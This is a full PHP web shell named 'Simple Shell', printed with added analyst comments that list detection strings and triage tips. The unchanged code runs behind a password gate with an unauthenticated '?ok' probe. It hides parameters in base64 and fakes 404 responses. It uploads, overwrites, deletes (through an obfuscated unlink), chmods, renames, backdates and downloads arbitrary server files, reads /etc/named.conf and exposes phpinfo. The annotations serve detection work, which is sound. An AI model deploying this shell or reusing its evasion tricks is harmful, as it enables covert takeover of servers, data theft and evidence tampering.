View file File name : mah.php Content :<?php
/*
 * Analyst notes. Only comments have been added to this listing; the code is unchanged.
 *
 * What the listing shows: a password-gated PHP file manager (page title "Simple Shell")
 * that browses, uploads, edits, deletes, renames, chmods, re-timestamps and downloads
 * files with whatever filesystem rights the PHP process has.
 *
 * Strings visible in this listing that can serve as detection anchors:
 *   - request parameter names: ok, info, dir, dl, file, edit, delete, chmod, chtime, rename, new
 *   - login form field "pwdyt" and session key "secretyt"
 *   - hash literal 1ab4d6f8d41abab37e7a1b67a2469085 next to an eightfold md5() nesting
 *   - the padded function-name literal "XuXnXlXiXnXkX"
 *   - footer text "Modified By #No_Identity" and the two sites linked beside it
 *
 * Past the password gate every GET and POST value is base64-decoded before use, so log
 * searches have to match on parameter names or decode the values first.
 */
?><?php
/* Liveness probe: any request whose $_REQUEST carries "ok" is answered with the fixed
   body ">ok<" and the script stops. This runs before the password gate and before the
   404 status is requested further down, so it answers without a session. */
if(isset($_REQUEST["ok"])){die(">ok<");};?><?php
/* Password gate. The whole check sits inside function_exists('session_start'), so it
   only applies where sessions are available. The session flag 'secretyt' is set when
   md5 applied eight times to POST field 'pwdyt' compares equal (loose ==) to the hash
   literal; otherwise the login form is printed and execution stops here. */
if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && md5(md5(md5(md5(md5(md5(md5(md5($_POST['pwdyt'])))))))) == '1ab4d6f8d41abab37e7a1b67a2469085') { $_SESSION['secretyt'] = true; } else { $bytesecform = <<<FORM <html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html> FORM; die($bytesecform); } } } ?> <?php
/* error_reporting(0) turns reporting off, so the two display_* switches show nothing.
   http_response_code(404) requests a 404 status while the full page is still emitted;
   where that takes effect, status-based log review under-counts hits and the response
   size of "404" entries for this path is the more useful signal. */
ini_set("display_errors",1);ini_set("display_startup_errors",1);error_reporting(0);http_response_code(404);
/* e() / d(): thin wrappers over base64_encode() / base64_decode(). */
function e($s){return base64_encode($s);}function d($s){return base64_decode($s);}
/* ?info=info is compared before the decoding loop below, so this one value is sent in
   clear; it prints phpinfo() and exits. */
if(isset($_GET["info"])&&$_GET["info"]==="info"){phpinfo();exit();}
/* Every GET and POST value is replaced in place by its base64-decoded form. */
foreach($_GET as $k=>$v){$_GET[$k]=d($v);}foreach($_POST as $k=>$v){$_POST[$k]=d($v);}
/* Working directory: the decoded "dir" value resolved with realpath(), falling back to
   this file's directory; the process then chdir()s into it. $edir is the query fragment
   reused in the links generated further down. */
$dir=realpath(isset($_GET["dir"])?$_GET["dir"]:__DIR__);$dir=$dir?$dir:__DIR__;chdir($dir);$edir="dir=".e($dir);
/* Download: streams the path given in GET "dl" as an application/octet-stream
   attachment, then exits. The Content-Disposition filename is read from $_POST["dl"],
   not from the GET value that names the file. */
if(isset($_GET["dl"])){if(!realpath($_GET["dl"])){exit();}header("Content-Description: File Transfer");header("Content-Type: application/octet-stream");header('Content-Disposition: attachment; filename="'.basename($_POST["dl"]).'"');readfile($_GET["dl"]);exit();}
/* Display helpers for the listing: size() formats filesize() with a K/M/G/T suffix;
   perms() renders a type letter, rwx flags and the octal mode taken from fileperms(). */
function size($path,$decimals=0){$bytes=filesize($path);$factor=floor((strlen($bytes)-1)/3);if($factor>0){$sz="KMGT";}return sprintf("%.{$decimals}f",$bytes/pow(1024,$factor)).@$sz[$factor-1]."B";}function perms($path){clearstatcache();$perms=fileperms($path);$x=["U","p","c","U","d","U","b","U","r","U","l","U","s","U","U","U",];$info=$x[$perms>>12].implode("",array_map(function($b,$m){return 
$b=="1"?$m:"-";},str_split(decbin($perms&0xfff).""),str_split("rwxrwxrwx")));return $info." ".substr(sprintf("%o",@fileperms($path)),-4);}
/* Placeholder posix_getpwuid() for hosts without the posix extension; nothing in the
   visible code calls it. */
if(!function_exists("posix_getpwuid")&&!extension_loaded("posix")){function posix_getpwuid($x){return["name"=>"---"];}}
/* The inline markup that follows sets the page title "Simple Shell" and defines
   client-side helpers that base64-encode (btoa) whatever is typed into the chmod,
   modified-time and rename prompts before appending it to the link as "new=". */ ?><!doctypehtml><html><head><meta content="width=device-width,initial-scale=0.5,user-scalable=yes"name="viewport"><title>Simple Shell</title><style>body,button,html,input{background:#000;color:gray;font-family:monospace}a{color:gray;text-decoration:none}button,input{border:1px solid gray;height:1.7em}table{width:100%;border:1px dotted gray;border-spacing:0}tr:hover{background:#161616}td,th{padding:2px 0;border:1px solid #666}textarea{width:80%;height:50vh;background:#000;color:green;tab-size:4}.btn{border:1px solid #666;border-radius:.3em;padding:0 .3em;display:inline-block;text-align:center}.btn:hover{border-color:#fff;background-color:#000;transition:background-color .2s linear}.directory{background:#444654}.directory:before{content:"DIR/";color:gray}.file{background:#343641}.file:before{content:"-";color:gray}.notwritable,.notwritable a{color:#ff7800}.writable,.writable a{color:#49ff00}.symlink{float:right;color:#e2c275}.icon{font-size:1.5em;padding:.1em .2em;margin:0}.delete:before{content:"\1F6AE";opacity:.7}.rename:before{content:"\270D";color:#00f}.download:before{content:"\2193\2193";color:green}.openlink:before{content:"\1F517"}.success{color:#ff0}.success:before{content:"\270C"}.failed{color:red}.failed:before{content:"\2622"}</style><script>function e(e){return btoa(e)}function chmod(n,r){var t=prompt("CHMOD:",r);return!!t&&(n.href+="&new="+e(t),!0)}function chtime(n,r){var t=prompt("Change modified time:",r);return!!t&&(n.href+="&new="+e(t),!0)}function rename(n,r){var t=prompt("Rename:",r);return!!t&&(n.href+="&new="+e(t),!0)}</script></head><body>YOUR IP:<?php echo $_SERVER["REMOTE_ADDR"]; ?><br>SERVER IP:<?php echo gethostbyname($_SERVER["HTTP_HOST"])." 
/ ".$_SERVER["SERVER_NAME"]; ?><br><?php
/* symlinkDomain(): reads /etc/named.conf with errors suppressed and counts the lines
   containing "zone" whose quoted name is longer than two characters, returning
   "<count> Domain"; when the file cannot be read it returns an HTML error string and
   sets $GLOBALS["need_to_update_header"]. A read of /etc/named.conf by the PHP
   process is itself a useful file-access alert. */
function symlinkDomain($dom){$d0mains=@file("/etc/named.conf",false);if(!$d0mains){$dom="<font color=red size=3px>Cant Read [ /etc/named.conf ]</font>";$GLOBALS["need_to_update_header"]="true";}else{$count=0;foreach($d0mains as $d0main){if(@strstr($d0main,"zone")){preg_match_all('#zone "(.*)"#',$d0main,$domains);flush();if(strlen(trim($domains[1][0]))>2){flush();$count++;}}}$dom="$count Domain";}return $dom;} ?>DOMAIN ON SERVER :<?=symlinkDomain($dom)?><br><a href="?info=info"class="btn"target="__blank">SERVER INFO</a>:<?php echo php_uname(); ?><br><form action="?<?php echo $edir; ?>"enctype="multipart/form-data"method="post"><input class="<?php echo is_writable($dir)?"writable":"notwritable"; ?>"name="file"type="file"><button type="submit">Upload</button></form><center><?php
/* Upload: the posted file is stored under the base name supplied by the client,
   relative to the working directory chosen earlier; no type or extension check. */
if(isset($_FILES["file"])){if(move_uploaded_file($_FILES["file"]["tmp_name"],basename($_FILES["file"]["name"]))){echo '<span class="success">UPLOAD SUCCESS!</span>';}else{echo '<span class="failed">UPLOAD FAILED!</span>';}}
/* Editor: when POST "edit" is present its decoded content overwrites the path named in
   GET "file"; the file's content is then rendered HTML-escaped inside a textarea. */
if(isset($_GET["file"])){if(isset($_POST["edit"])){if(@file_put_contents($_GET["file"],$_POST["edit"])){echo '<span class="success">EDIT SUCCESS!</span>';}else{echo '<span class="failed">EDIT FAILED!</span>';}}echo '<form action="?file='.e($_GET["file"])."&".$edir.'" method="post" onsubmit="edit.value=e(edit.value)"><textarea id="edit" name="edit">'.htmlspecialchars(file_get_contents($_GET["file"]),ENT_QUOTES|ENT_SUBSTITUTE|ENT_COMPAT,"UTF-8")."</textarea><button>Update</button></form>";}
/* Delete: the callee name is assembled at run time by stripping the X characters from
   "XuXnXlXiXnXkX", which yields unlink. A plain-text search for that function name
   misses this line; match on the padded literal or on variable-function calls. */
if(isset($_GET["delete"])){$x=str_replace("X","","XuXnXlXiXnXkX");if($x($_GET["delete"])){echo '<span class="success">DELETE SUCCESS!</span>';}else{echo '<span class="failed">DELETE FAILED!</span>';}}
/* Mode change: "new" is parsed as an octal number and applied to the path in "chmod". */
if(isset($_GET["chmod"],$_GET["new"])){if(chmod($_GET["chmod"],intval($_GET["new"],8))){echo '<span class="success">CHMOD SUCCESS!</span>';}else{echo '<span class="failed">CHMOD 
FAILED!</span>';}}
/* Timestamp change: sets the modification time of the path in "chtime" to
   strtotime(new). Modification times of files this script can write should not be
   trusted during triage. NOTE(review): general POSIX behaviour, not shown in this
   listing - the inode change time is not settable this way, so compare ctime with
   mtime on suspect files. */
if(isset($_GET["chtime"],$_GET["new"])){if(touch($_GET["chtime"],intval(strtotime($_GET["new"])))){echo '<span class="success">TIME MACHINE SUCCESS!</span>';}else{echo '<span class="failed">TIME MACHINE FAILED!</span>';}}
/* Rename: moves the path in "rename" to basename(new) inside the working directory. */
if(isset($_GET["rename"],$_GET["new"])){if(rename($_GET["rename"],$dir."/".basename($_GET["new"]))){echo '<span class="success">RENAME SUCCESS!</span>';}else{echo '<span class="failed">RENAME FAILED!</span>';}}
/* Listing input: scandir() entries split into directories (all except ".") and files. */
$dirs=[];$files=[];foreach(scandir($dir)as $p){if(is_dir($dir."/".$p)){if($p!="."){$dirs[]=$dir."/".$p;}}else{$files[]=$dir."/".$p;}} ?></center><form onsubmit="dir.value=e(dir.value)">Directory: <input class="<?php echo is_writable($dir)?"writable":"notwritable"; ?>"name="dir"id="dir"style="width:500px"value="<?php echo $dir; ?>"><button>GO</button><a href="?dir=<?php echo e(realpath($_SERVER["DOCUMENT_ROOT"])); ?>">[Root Path]</a><a href="?dir=<?php echo e(realpath(__DIR__)); ?>">[Shell Path]</a></form><table><tr><th></th><th>SIZE</th><th>Modified Date</th><th>PERMS</th><th>ACTION</th></tr><?php
/* One table row per entry, directories first. Paths in the generated links are
   base64-encoded, and each action link maps to one of the request handlers earlier in
   the file (chtime, chmod, delete, rename, dl). */
foreach(array_merge($dirs,$files)as $path){$d=is_dir($path);$w=is_writable($path); ?><tr><td class="<?php echo($d?"directory":"file")." 
".($w?"writable":"notwritable"); ?>"><a href="?<?php echo $d?"dir=".e($path)."":"file=".e($path)."&".$edir; ?>"><?php echo htmlspecialchars(basename($path)); ?></a><?php echo is_link($path)?'<span class="symlink">'.readlink($path)."</span>":""; ?></td><td><?php echo $d?"---":size($path); ?></td><td><a href="?chtime=<?php echo e($path)."&".$edir; ?>"class="btn"onclick='return chtime(this,"<?php $chtime=date("M-d-Y H:i:s",filemtime($path));echo $chtime; ?>")'><?php echo $chtime; ?></a></td><td><a href="?chmod=<?php echo e($path)."&".$edir; ?>"class="btn"onclick='return chmod(this,"<?php echo substr(sprintf("%o",@fileperms($path)),-4); ?>")'><?php echo perms($path); ?></a></td><td><?php if(basename($path)!==".."){ ?><a href="?delete=<?php echo e($path)."&".$edir; ?>"class="btn icon delete"onclick='return confirm("Sure to delete?")'title="Delete"></a><a href="?rename=<?php echo e($path)."&".$edir; ?>"class="btn icon rename"onclick='return rename(this,"<?php echo basename($path); ?>")'title="Rename"></a><?php if(!$d){echo '<a title="Download" class="btn icon download" href="?dl='.e($path).'"></a>';}} ?></td></tr><?php } ?></table>Modified By #No_Identity :: <a href="https://github.com/yon3zu">github.com/yon3zu</a> - <a href="https://linuxploit.com/">linuxploit.com</a></body></html>